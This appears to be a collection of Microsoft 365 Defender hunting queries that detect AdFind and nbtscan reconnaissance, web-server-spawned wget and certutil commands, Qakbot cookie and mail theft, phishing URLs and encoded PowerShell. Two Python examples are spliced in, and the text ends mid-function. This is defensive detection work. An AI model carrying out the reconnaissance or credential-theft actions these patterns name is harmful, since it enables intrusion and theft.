FILE: Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md
================================================
# Suspicious enumeration using Adfind tool

Attackers can use AdFind, which is an administrative tool, to gather information about domain controllers or ADFS servers. They may also rename the executable to look like other benign tools on the system. The query below looks for AdFind usage in command-line arguments, irrespective of the executable name, within a short span of time. You can limit the query to your DC and ADFS servers.

The references below discuss suspicious use of AdFind by adversaries.

- [AdFind Recon](https://thedfirreport.com/2020/05/08/adfind-recon/)
- [Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents](https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html)
- [Analyzing Solorigate, the compromised DLL file that started a sophisticated cyberattack, and how Microsoft Defender helps protect customers](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/)

This query is inspired by an Azure Sentinel [detection](https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/SecurityEvent/Suspicious_enumeration_using_adfind.yaml).

## Query

```Kusto
let startdate = 10d;
let lookupwindow = 2m;
let threshold = 3; //number of commandlines in the set below
let DCADFSServersList = dynamic (["DCServer01", "DCServer02", "ADFSServer01"]); // Enter a reference list of hostnames for your DC/ADFS servers
let tokens = dynamic(["objectcategory","domainlist","dcmodes","adinfo","trustdmp","computers_pwdnotreqd","Domain Admins", "objectcategory=person", "objectcategory=computer", "objectcategory=*"]);
DeviceProcessEvents
| where Timestamp between (ago(startdate) .. now())
//| where DeviceName in (DCADFSServersList) // Uncomment to limit it to your DC/ADFS servers list if specified above or any pattern in hostnames (startswith, matches regex, etc).
| where ProcessCommandLine has_any (tokens)
| where ProcessCommandLine matches regex "(.*)>(.*)"
| summarize Commandlines = make_set(ProcessCommandLine), LastObserved=max(Timestamp) by bin(Timestamp, lookupwindow), AccountName, DeviceName, InitiatingProcessFileName, FileName
| extend Count = array_length(Commandlines)
| where Count > threshold
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | V | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | V | |
| Lateral movement | | |
| Collection | V | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also

- [Locate Nobelium implant receiving DNS response](../Campaigns/c2-lookup-from-nonbrowser[Nobelium].md)
- [Locate Nobelium implant receiving DNS response](../Campaigns/c2-lookup-response[Nobelium].md)
- [Compromised certificate [Nobelium]](../Campaigns/compromised-certificate[Nobelium].md)
- [FireEye Red Team tool CVEs [Nobelium]](../Campaigns/fireeye-red-team-tools-CVEs%20[Nobelium].md)
- [FireEye Red Team tool HASHs [Nobelium]](../Campaigns/fireeye-red-team-tools-HASHs%20[Nobelium].md)
- [View data on software identified as affected by Nobelium campaign](../Campaigns/known-affected-software-orion[Nobelium].md)
- [Locate SolarWinds processes launching suspicious PowerShell commands](../Campaigns/launching-base64-powershell[Nobelium].md)
- [Locate SolarWinds processes launching command prompt with the echo command](../Campaigns/launching-cmd-echo[Nobelium].md)
- [Locate Nobelium-related malicious DLLs created in the system or locally](../Campaigns/locate-dll-created-locally[Nobelium].md)
- [Locate Nobelium-related malicious DLLs loaded in memory](../Campaigns/locate-dll-loaded-in-memory[Nobelium].md)
- [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](../Campaigns/possible-affected-software-orion[Nobelium].md)
- [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
- [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
- [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
- [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
- [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
- [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
- [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
- [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
- [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
- [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
- [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
- [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
- [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
- [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
- [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)

## Contributor info

**Contributor:** Stefan Sellmer

**GitHub alias:** @stesell

**Organization:** Microsoft 365 Defender

**Contact info:** stesell@microsoft.com

================================================
FILE: Discovery/URL Detection.txt
================================================
// This query finds network communication to a specific URL.
// Please note that in line #7 it filters RemoteUrl using the has operator, which looks for a "whole term" and runs faster.
// Example: RemoteUrl has "microsoft" matches "www.microsoft.com" but not "microsoftonline.com"
let partialRemoteUrlToDetect = "microsoft.com"; // Change this to a URL you'd like to find machines connecting to
DeviceNetworkEvents
| where Timestamp > ago(7d)
and RemoteUrl has partialRemoteUrlToDetect // Can be changed to the "contains" operator as explained above
| project Timestamp, DeviceName, DeviceId, ReportId
| top 100 by Timestamp desc

================================================
FILE: Discovery/VulnComputers.md
================================================
# Detect LDAP queries that search for computer operating system

Detect Active Directory LDAP queries that try to find operating systems that are vulnerable to specific vulnerabilities.

This LDAP query covers the Metasploit enum_ad_computers tool.

## Query

```
let ComputerObject = "objectCategory=computer";
let ComputerClass = "objectClass=computer";
let SamAccountComputer = "sAMAccountType=805306369";
let OperatingSystem = "operatingSystem=";
IdentityQueryEvents
| where ActionType == "LDAP query"
| parse Query with * "Search Scope: " SearchScope ", Base Object:" BaseObject ", Search Filter: " SearchFilter
| where (SearchFilter contains ComputerObject or SearchFilter contains ComputerClass or SearchFilter contains SamAccountComputer) and SearchFilter contains OperatingSystem
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | X | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributors info

**Contributor:** Mor Rubin

**GitHub alias:** https://github.com/morRubin

**Organization:** Microsoft

**Contact info:** Twitter: MorRubin

**Contributor:** Oz Soprin

**GitHub alias:** https://github.com/ozSoprin

**Organization:** Microsoft

**Contact info:** Twitter: ozSoprin

================================================
FILE: Discovery/detect-nbtscan-activity.md
================================================
# Detect nbtscan activity

This query was originally published in the threat analytics report, *Operation Soft Cell*.

[Operation Soft Cell](https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers) is a series of campaigns targeting users' call logs at telecommunications providers throughout the world. These attacks date from as early as 2012.

Operation Soft Cell operators have been known to run *[nbtscan.exe](https://unixwiz.net/tools/nbtscan.html)*, a legitimate MS-DOS command-line tool used to discover any NETBIOS nameservers on a local or remote TCP/IP network.

The following query detects any nbtscan activity on the system over the past seven days.
## Query

```Kusto
let nbtscan = pack_array("9af0cb61580dba0e380cddfe9ca43a3e128ed2f8", "90da10004c8f6fafdaa2cf18922670a745564f45");
union DeviceProcessEvents , DeviceFileEvents
| where Timestamp > ago(7d)
| where FileName =~ "nbtscan.exe" or SHA1 in (nbtscan)
| project FolderPath, FileName, InitiatingProcessAccountName, InitiatingProcessFileName, ProcessCommandLine, Timestamp
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | v | The nbtscan tool is also incorporated in legitimate software packages not associated with Operation Soft Cell, to generate network inventories. After running this query, admins should investigate further to determine if the activity is suspicious. |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Discovery/detect-suspicious-commands-initiated-by-web-server-processes.md
================================================
# Detect suspicious commands initiated by web server processes

This query was originally published in the threat analytics report, *Operation Soft Cell*.

[Operation Soft Cell](https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers) is a series of campaigns targeting users' call logs at telecommunications providers throughout the world. These attacks date from as early as 2012.

Operation Soft Cell operators sometimes use legitimate web server processes to launch commands, especially for network discovery and user/owner discovery. The following query detects activity of this kind.

## Query

```Kusto
// Suspicious commands launched by web server processes
DeviceProcessEvents
| where Timestamp > ago(7d)
// Pivoting on parents or grand parents
and (((InitiatingProcessParentFileName in("w3wp.exe", "beasvc.exe", "httpd.exe") or InitiatingProcessParentFileName startswith "tomcat")
or InitiatingProcessFileName in("w3wp.exe", "beasvc.exe", "httpd.exe") or InitiatingProcessFileName startswith "tomcat"))
and FileName in~('cmd.exe','powershell.exe')
| where ProcessCommandLine contains '%temp%'
or ProcessCommandLine has 'wget'
or ProcessCommandLine has 'whoami'
or ProcessCommandLine has 'certutil'
or ProcessCommandLine has 'systeminfo'
or ProcessCommandLine has 'ping'
or ProcessCommandLine has 'ipconfig'
or ProcessCommandLine has 'timeout'
| summarize any(Timestamp), any(FileName), makeset(ProcessCommandLine), any(InitiatingProcessFileName), any(InitiatingProcessParentFileName) by DeviceId
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | This query detects whenever, over the past seven days, a web server process launched a CLI command. This sort of activity, although suspicious, is not by itself actively harmful. Administrators should investigate further to determine if the event was malicious or associated with Operation Soft Cell. |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | v | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Discovery/doppelpaymer.md
================================================
# Detect DoppelPaymer performing reconnaissance with net.exe

This query was originally published in the threat analytics report, *Doppelpaymer: More human-operated ransomware*. There is also a related [blog](https://msrc-blog.microsoft.com/2019/11/20/customer-guidance-for-the-dopplepaymer-ransomware/).

[DoppelPaymer](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/DoppelPaymer!MTB&threatId=-2147205372) is ransomware that is spread manually by human operators. These operators have exhibited extensive knowledge of system administration and common network security misconfigurations. For example, they may use *net.exe* to run reconnaissance and find service accounts to target. They often use stolen credentials from over-privileged service accounts to turn off security software, run malicious commands, and spread malware throughout an organization.

The following query detects the *net.exe* reconnaissance method described above. The [See also](#See-also) section below lists links to other queries associated with DoppelPaymer.
## Query

```Kusto
// Finds Net commands used to locate high-value accounts
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName == "net.exe"
// Create a set for the command lines
| summarize makeset(ProcessCommandLine) by DeviceId, bin(Timestamp, 5m)
// Other process launches by Net in that same timeframe
| where (set_ProcessCommandLine has "admin" and set_ProcessCommandLine has_any("domain", "enterprise", "backup operators"))
and set_ProcessCommandLine has "group" and set_ProcessCommandLine contains "/do"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | v | |
| Lateral movement | v | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also

* [Detect DoppelPaymer operators spreading files with PsExec](../Lateral%20Movement/doppelpaymer-psexec.md)
* [Detect DoppelPaymer operators stopping services](../Defense%20evasion/doppelpaymer-stop-services.md)
* [Detect DoppelPaymer operators dumping credentials with ProcDump](../Credential%20Access/doppelpaymer-procdump.md)

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Discovery/qakbot-campaign-esentutl.md
================================================
# Browser cookie theft by campaigns using Qakbot malware

This query was originally published in the threat analytics report, *Qakbot blight lingers, seeds ransomware*.

[Qakbot](https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/) is malware that steals login credentials from banking and financial services. It has been deployed against small businesses as well as major corporations. Some outbreaks have involved targeted ransomware campaigns that use a similar set of techniques. Links to related queries are listed under [See also](#See-also).

The following query detects possible use of the system process, *esentutl.exe*, to look through a user's browser history and steal cookies.

## Query

```Kusto
DeviceProcessEvents
| where FileName == "esentutl.exe"
| where ProcessCommandLine has "WebCache"
| where ProcessCommandLine has_any ("V01", "/s", "/d")
| project ProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | v | |
| Discovery | v | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also

* [Self-deletion by Qakbot malware](../Defense%20evasion/qakbot-campaign-self-deletion.md)
* [Process injection by Qakbot malware](../Defense%20evasion/qakbot-campaign-process-injection.md)
* [Registry edits by campaigns using Qakbot malware](../Persistence/qakbot-campaign-registry-edit.md)
* [Outlook email access by campaigns using Qakbot malware](../Discovery/qakbot-campaign-outlook.md)
* [Javascript use by Qakbot malware](../Execution/qakbot-campaign-suspicious-javascript.md)

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Discovery/qakbot-campaign-outlook.md
================================================
# Outlook email access by campaigns using Qakbot malware

This query was originally published in the threat analytics report, *Qakbot blight lingers, seeds ransomware*.

[Qakbot](https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/) is malware that steals login credentials from banking and financial services. It has been deployed against small businesses as well as major corporations. Some outbreaks have involved targeted ransomware campaigns that use a similar set of techniques. Links to related queries are listed under [See also](#See-also).

The following query detects attempts to access files in the local path that contain Outlook emails.

## Query

```Kusto
DeviceFileEvents
| where FolderPath hasprefix "EmailStorage"
| where FolderPath has "Outlook"
| project FileName, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine, DeviceId, Timestamp
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | v | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also

* [Self-deletion by Qakbot malware](../Defense%20evasion/qakbot-campaign-self-deletion.md)
* [Process injection by Qakbot malware](../Defense%20evasion/qakbot-campaign-process-injection.md)
* [Registry edits by campaigns using Qakbot malware](../Persistence/qakbot-campaign-registry-edit.md)
* [Browser cookie theft by campaigns using Qakbot malware](../Discovery/qakbot-campaign-esentutl.md)
* [Javascript use by Qakbot malware](../Execution/qakbot-campaign-suspicious-javascript.md)

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Email Queries/Appspot Phishing Abuse.md
================================================
# Appspot Phishing Abuse

This query helps surface phishing campaigns associated with Appspot abuse. These emails frequently contain phishing links that utilize the recipients' own email address as a unique identifier in the URI.
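As an added example that is not part of the repository, the following Python runs the same check as the Appspot query in this file offline: EmailUrlInfo-like rows are joined to EmailEvents-like rows on NetworkMessageId, the host is matched against the `-dot-` appspot.com pattern, and the recipient address is looked for in the URL in plain text or base64 (padded or unpadded, after percent-decoding). The substring comparison is a simplification of the Kusto `has` operator, and all sample rows are constructed.

```python
import base64
import re
from typing import Dict, List, Optional
from urllib.parse import unquote, urlsplit

# Same host pattern as the hunting query: "<service>-dot-<project>.appspot.com".
APPSPOT_HOST_RE = re.compile(r"\b[\w\-]+-dot-[\w\-\.]+\.appspot\.com\b")


def is_appspot_host(url: str) -> bool:
    """Apply the pattern to the host part only, as the query applies it to UrlDomain."""
    host = urlsplit(url).hostname or ""
    return APPSPOT_HOST_RE.search(host) is not None


def recipient_marker(url: str, recipient: str) -> Optional[str]:
    """Return 'plain', 'base64' or 'base64url' depending on how the recipient address
    appears in the URL, or None. Percent-decoding first means '%40' or a '%3D'-encoded
    padding character cannot hide the match; base64 is compared case-sensitively."""
    decoded = unquote(url)
    if recipient.lower() in decoded.lower():
        return "plain"
    raw = recipient.encode()
    for label, enc in (("base64", base64.b64encode(raw)),
                       ("base64url", base64.urlsafe_b64encode(raw))):
        text = enc.decode()
        # Campaigns sometimes drop the '=' padding, so check both forms.
        if text in decoded or text.rstrip("=") in decoded:
            return label
    return None


def hunt(url_rows: List[Dict[str, str]], email_rows: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Inner join on NetworkMessageId (one EmailEvents row per recipient, as in the
    real table) and keep URLs that match both conditions."""
    recipients: Dict[str, List[str]] = {}
    for row in email_rows:
        recipients.setdefault(row["NetworkMessageId"], []).append(row["RecipientEmailAddress"])
    hits = []
    for row in url_rows:
        if not is_appspot_host(row["Url"]):
            continue
        for rcpt in recipients.get(row["NetworkMessageId"], []):
            marker = recipient_marker(row["Url"], rcpt)
            if marker is not None:
                hits.append({"NetworkMessageId": row["NetworkMessageId"],
                             "RecipientEmailAddress": rcpt,
                             "Url": row["Url"], "Marker": marker})
    return hits


# Constructed sample rows (not real campaign data); "acme-portal" is a made-up project name.
SAMPLE_URL_ROWS = [
    {"NetworkMessageId": "msg-1", "Url": "https://login-dot-acme-portal.appspot.com/#alice@example.com"},
    {"NetworkMessageId": "msg-2",
     "Url": "https://secure-dot-acme-portal.appspot.com/index.html?user=YWxpY2VAZXhhbXBsZS5jb20%3D"},
    {"NetworkMessageId": "msg-3", "Url": "https://docs.appspot.com/report"},
    {"NetworkMessageId": "msg-4", "Url": "https://login-dot-acme-portal.appspot.com/#bob@example.com"},
]
SAMPLE_EMAIL_ROWS = [
    {"NetworkMessageId": "msg-1", "RecipientEmailAddress": "alice@example.com"},
    {"NetworkMessageId": "msg-2", "RecipientEmailAddress": "alice@example.com"},
    {"NetworkMessageId": "msg-3", "RecipientEmailAddress": "alice@example.com"},
    {"NetworkMessageId": "msg-4", "RecipientEmailAddress": "carol@example.com"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_URL_ROWS, SAMPLE_EMAIL_ROWS):
        print(hit["NetworkMessageId"], hit["Marker"], hit["Url"])
```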
This campaign was published on Twitter by [@MsftSecIntel](https://twitter.com/MsftSecIntel) at this link: https://twitter.com/MsftSecIntel/status/1374148156301004800

## Query

```
EmailUrlInfo
// Detect URLs with a subdomain on appspot.com
| where UrlDomain matches regex @'\b[\w\-]+-dot-[\w\-\.]+\.appspot\.com\b'
// Enrich results with sender and recipient data
| join kind=inner EmailEvents on $left.NetworkMessageId==$right.NetworkMessageId
// Phishing attempts from Appspot related campaigns typically contain the recipient's email address in the URI
// Example 1: https://example-dot-example.appspot.com/#recipient@domain.com
// Example 2: https://example-dot-example.appspot.com/index.html?user=recipient@domain.com
| where Url has RecipientEmailAddress
// Some phishing campaigns pass recipient email as a Base64 encoded string in the URI
or Url has base64_encode_tostring(RecipientEmailAddress)
| project-away Timestamp1, NetworkMessageId1, ReportId1
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | Credential phishing |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Email Queries/JNLP-File-Attachment.md
================================================
## JNLP File Attachments

JNLP file extensions are an uncommon file type often used to deliver malware.

## Query

This query looks for email attachment names ending with a JNLP file extension.

```
EmailAttachmentInfo
| where FileName endswith ".jnlp"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Email Queries/PhishingEmailUrlRedirector.md
================================================
# Phishing email URL redirection

This query was originally published on Twitter, by [@MsftSecIntel](https://twitter.com/MsftSecIntel).

The query helps detect emails associated with the open redirector URL campaign. The campaign's URLs begin with the distinct pattern, hxxps://t[.]domain[.]tld/r/?. Attackers use URL redirection to manipulate users into visiting a malicious website or to evade detection.

## Query

Generic regex for all emails containing the base "t-dot" redirector pattern:

```
EmailUrlInfo
| where Url matches regex @"s?\:\/\/(?:www\.)?t\.(?:[\w\-\.]+\/+)+(?:r|redirect)\/?\?"
```

Specific regex for campaigns containing known malicious infrastructure as observed from late 2020 until at least April 2021:

```
EmailUrlInfo
//This regex identifies emails containing the "T-Dot" redirector pattern in the URL
| where Url matches regex @"s?\:\/\/(?:www\.)?t\.(?:[\w\-\.]+\/+)+(?:r|redirect)\/?\?"
//This regex narrows in on emails that contain the known malicious domain pattern in the URL from the most recent campaigns
and Url matches regex @"[a-zA-Z]\-[a-zA-Z]{2}\.(xyz|club|shop)"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Email Queries/referral-phish-emails.md
================================================
# Referral infrastructure credential phishing emails

The "Referral" infrastructure is a point-in-time set of infrastructure associated with spoofed emails that imitate SharePoint and other legitimate products to conduct credential phishing. The operator is also known to use legitimate URL infrastructure such as Google, Microsoft, and Digital Ocean to host their phishing pages.

## Query

Use this query to search for instances of malicious senders associated with multiple phishing campaigns over a few months in 2021, with subjects approximately similar to "Referral". These mails also attempt to bypass protections and reach inboxes by spoofing the recipient domain in the displayed email address. This query matches instances where the displayed email address matches the recipient's domain and joins to the email URL data for easy hunting on potential malicious credential theft sites.
``` let EmailAddresses = pack_array ('zreffertalt.com.com','zreffesral.com.com','kzreffertal.com.com', 'wzreffertal.com.com','refferal.comq','refferal.net','zreffertal.com.com', 'zrefferal.com.com','refferasl.com.com','zreffesral.com','zrefsfertal.com.com', 'irefferal.com','refferasl.co','zrefferal.com'); EmailEvents | where SenderMailFromDomain in (EmailAddresses) | extend RecipientDomain = extract("[^@]+$", 0, RecipientEmailAddress) | where SenderFromDomain == RecipientDomain | join EmailUrlInfo on $left.NetworkMessageId == $right.NetworkMessageId ``` ## Category Use this query to detect the following attack techniques and tactics (see MITRE ATT&CK framework) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | v | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Execution/Base64 Detector and Decoder.md ================================================ # Base64 Detector and Decoder This query will identify strings in process command lines which match Base64 encoding format, extract the string to a column called Base64, and decode it in a column called DecodedString. 
## Query

```
DeviceProcessEvents
| extend SplitLaunchString = split(ProcessCommandLine, " ")
| mvexpand SplitLaunchString
| where SplitLaunchString matches regex "^[A-Za-z0-9+/]{50,}[=]{0,2}$"
| extend Base64 = tostring(SplitLaunchString)
| extend DecodedString = base64_decodestring(Base64)
| where isnotempty(DecodedString)
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Michael Melone

**GitHub alias:** mjmelone

**Organization:** Microsoft

**Contact info:** @PowershellPoet

================================================
FILE: Execution/Base64encodePEFile.txt
================================================
// Finding base64 encoded PE files header seen in the command line parameters
// "TVqQAAMAAAAEAAA" is the Base64 encoding of the first bytes of the MZ (DOS) header; it only appears in
// this exact form when the PE image starts at a 3-byte aligned offset of the encoded data
// Tags: #fileLess #powershell
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine contains "TVqQAAMAAAAEAAA"
| top 1000 by Timestamp

================================================
FILE: Execution/Detect Encoded Powershell.md
================================================
# Detect Encoded PowerShell

This query will detect encoded PowerShell based on the parameters passed during process creation. It will also work if the PowerShell executable is renamed or tampered with, since detection is based solely on a regex of the launch string. The `-EncodedCommand` argument is UTF-16LE text in Base64; the query decodes it as UTF-8 and strips the interleaved null bytes, which is adequate for ASCII scripts but will garble non-ASCII characters.
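The Base64 Detector and Decoder and Detect Encoded PowerShell queries above, reimplemented as an added Python example over constructed launch strings (not repository code). It does what the two queries do together, with two additions a practitioner would want: it decodes `-EncodedCommand` payloads as UTF-16LE rather than stripping nulls, and it classifies tokens that are not text (an MZ header means an embedded executable, which the KQL silently drops). The flag-prefix rule and the sample command lines are this example's own assumptions.

```python
# Added example, not part of the repository: detect and decode Base64 blobs in launch strings.
import base64
import binascii
import re

# Same token shape the two queries look for: 50+ Base64 characters plus optional padding.
B64_TOKEN = re.compile(r"^[A-Za-z0-9+/]{50,}={0,2}$")


def is_encoded_command_flag(token: str) -> bool:
    """True for -EncodedCommand and every abbreviation powershell.exe accepts:
    -e, -ec and any longer prefix such as -en, -enc, -encoded. (-ex / -exec resolve to
    -ExecutionPolicy and must not match.) The query's regex enumerates the same forms;
    the '/' switch prefix is not covered here, as in the query."""
    if len(token) < 2 or token[0] != "-":
        return False
    rest = token[1:].lower()
    return rest == "ec" or "encodedcommand".startswith(rest)


def decode_payload(token: str):
    """Decode one Base64 token and classify it.

    Returns (kind, text): 'utf16' for a -EncodedCommand payload (UTF-16LE, which is why the
    KQL strips \\x00 after a UTF-8 decode), 'utf8' for plain text, 'pe' when the bytes start
    with an MZ header (an embedded executable, what the TVqQAAMAAAAEAAA search catches),
    'binary' otherwise. base64_decodestring() in KQL returns empty for the last two, so the
    Base64 Detector query discards them."""
    try:
        raw = base64.b64decode(token, validate=True)
    except binascii.Error:
        return "invalid", None
    if raw.startswith(b"MZ"):
        return "pe", None
    # ASCII text encoded as UTF-16LE has a NUL in every odd byte position.
    if len(raw) % 2 == 0 and raw[1::2] == b"\x00" * (len(raw) // 2):
        return "utf16", raw.decode("utf-16-le")
    try:
        return "utf8", raw.decode("utf-8")
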